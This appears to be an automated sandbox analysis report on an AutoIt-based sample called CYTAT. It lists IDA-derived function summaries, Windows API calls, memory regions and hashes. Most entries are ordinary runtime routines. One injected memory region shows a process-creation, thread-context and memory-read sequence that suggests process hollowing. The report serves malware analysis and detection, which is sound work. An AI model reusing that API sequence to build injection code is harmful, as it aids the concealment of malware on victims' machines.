                                                control_flow_graph 2119 401250-40125c 2120 401262-401293 call 412f40 call 401b80 2119->2120 2121 4012e8-4012ed 2119->2121 2126 4012d1-4012e2 KillTimer SetTimer 2120->2126 2127 401295-4012b5 2120->2127 2126->2121 2128 4012bb-4012bf 2127->2128 2129 4272ec-4272f2 2127->2129 2130 4012c5-4012cb 2128->2130 2131 42733f-427346 2128->2131 2132 4272f4-427315 Shell_NotifyIconW 2129->2132 2133 42731a-42733a Shell_NotifyIconW 2129->2133 2130->2126 2134 427393-4273b4 Shell_NotifyIconW 2130->2134 2135 427348-427369 Shell_NotifyIconW 2131->2135 2136 42736e-42738e Shell_NotifyIconW 2131->2136 2132->2126 2133->2126 2134->2126 2135->2126 2136->2126
                                                APIs
                                                  • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                  • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                  • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                • String ID:
                                                • API String ID: 3300667738-0
                                                • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A

                                                 Control-flow Graph (rendered figure, nodes marked executed / not executed): blocks 40e4c0-40e4e5 (call 403350, RegOpenKeyExW), 40e4eb-40e4f0, 427190-4271ae (RegQueryValueExW), 4271b0-4271f5 (call 4115d7, call 43652f, RegQueryValueExW), 4271f7-42720e (call 402160), 427210-427219 (call 436508), 42721a-42722a (RegCloseKey)
                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: QueryValue$CloseOpen
                                                • String ID: Include$Software\AutoIt v3\AutoIt
                                                • API String ID: 1586453840-614718249
                                                • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768

                                                 Control-flow Graph (rendered figure, nodes marked executed / not executed): single block 410570-4105f1 (CreateWindowExW x2, ShowWindow x2)
                                                APIs
                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Window$CreateShow
                                                • String ID: AutoIt v3$edit
                                                • API String ID: 1584632944-3779509399
                                                • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                APIs
                                                  • Part of subcall function 03FC13E0: Sleep.KERNELBASE(000001F4), ref: 03FC13F1
                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03FC161A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1273163633.0000000003FBF000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FBF000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3fbf000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CreateFileSleep
                                                • String ID: 5MBHF9X5HTW0MNM00OA0R5GPL
                                                • API String ID: 2694422964-1523133119
                                                • Opcode ID: 74e18d75c01c1c7f24549686e3bc5a9f1c06aa198d0bb39b8b15985597893119
                                                • Instruction ID: bc992003ee76e5672912920a0d3e018b787c2604872de3434d5158658c5612ad
                                                • Opcode Fuzzy Hash: 74e18d75c01c1c7f24549686e3bc5a9f1c06aa198d0bb39b8b15985597893119
                                                • Instruction Fuzzy Hash: A951A230D14389DAEF11DBB4C954BDEBBB8AF15304F044199E6487B2C1C6B94B48CBA5
                                                APIs
                                                • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                • _wcsncpy.LIBCMT ref: 00401C41
                                                • _wcscpy.LIBCMT ref: 00401C5D
                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                • String ID: Line:
                                                • API String ID: 1874344091-1585850449
                                                • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Close$OpenQueryValue
                                                • String ID: Control Panel\Mouse
                                                • API String ID: 1607946009-824357125
                                                • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                APIs
                                                • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                • _wcsncpy.LIBCMT ref: 004102ED
                                                • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                • _wcsncpy.LIBCMT ref: 00410340
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                • String ID:
                                                • API String ID: 3170942423-0
                                                • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                APIs
                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 03FC0B9B
                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03FC0C31
                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03FC0C53
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1273163633.0000000003FBF000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FBF000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3fbf000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                • String ID:
                                                • API String ID: 2438371351-0
                                                • Opcode ID: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                                • Instruction ID: 077f49a7afd7454db156fc53da0a7024c6e2b52049511530bbf90cb0b57d0719
                                                • Opcode Fuzzy Hash: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                                • Instruction Fuzzy Hash: 16620E30A64259DBEB24CFA4C950BDEB376EF58300F1091A9D10DEB390EB759E81CB59
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: Error:
                                                • API String ID: 4104443479-232661952
                                                • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                APIs
                                                • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                  • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                  • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                  • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                  • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                  • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                  • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                • String ID: X$pWH
                                                • API String ID: 85490731-941433119
                                                • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                • String ID:
                                                • API String ID: 1794320848-0
                                                • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                APIs
                                                • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Process$CurrentTerminate
                                                • String ID:
                                                • API String ID: 2429186680-0
                                                • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                APIs
                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: IconNotifyShell_
                                                • String ID:
                                                • API String ID: 1144537725-0
                                                • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                                • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                                APIs
                                                • _malloc.LIBCMT ref: 0043214B
                                                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                • _malloc.LIBCMT ref: 0043215D
                                                • _malloc.LIBCMT ref: 0043216F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _malloc$AllocateHeap
                                                • String ID:
                                                • API String ID: 680241177-0
                                                • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                APIs
                                                • TranslateMessage.USER32(?), ref: 00409556
                                                • DispatchMessageW.USER32(?), ref: 00409561
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Message$DispatchPeekTranslate
                                                • String ID:
                                                • API String ID: 4217535847-0
                                                • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                                                • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
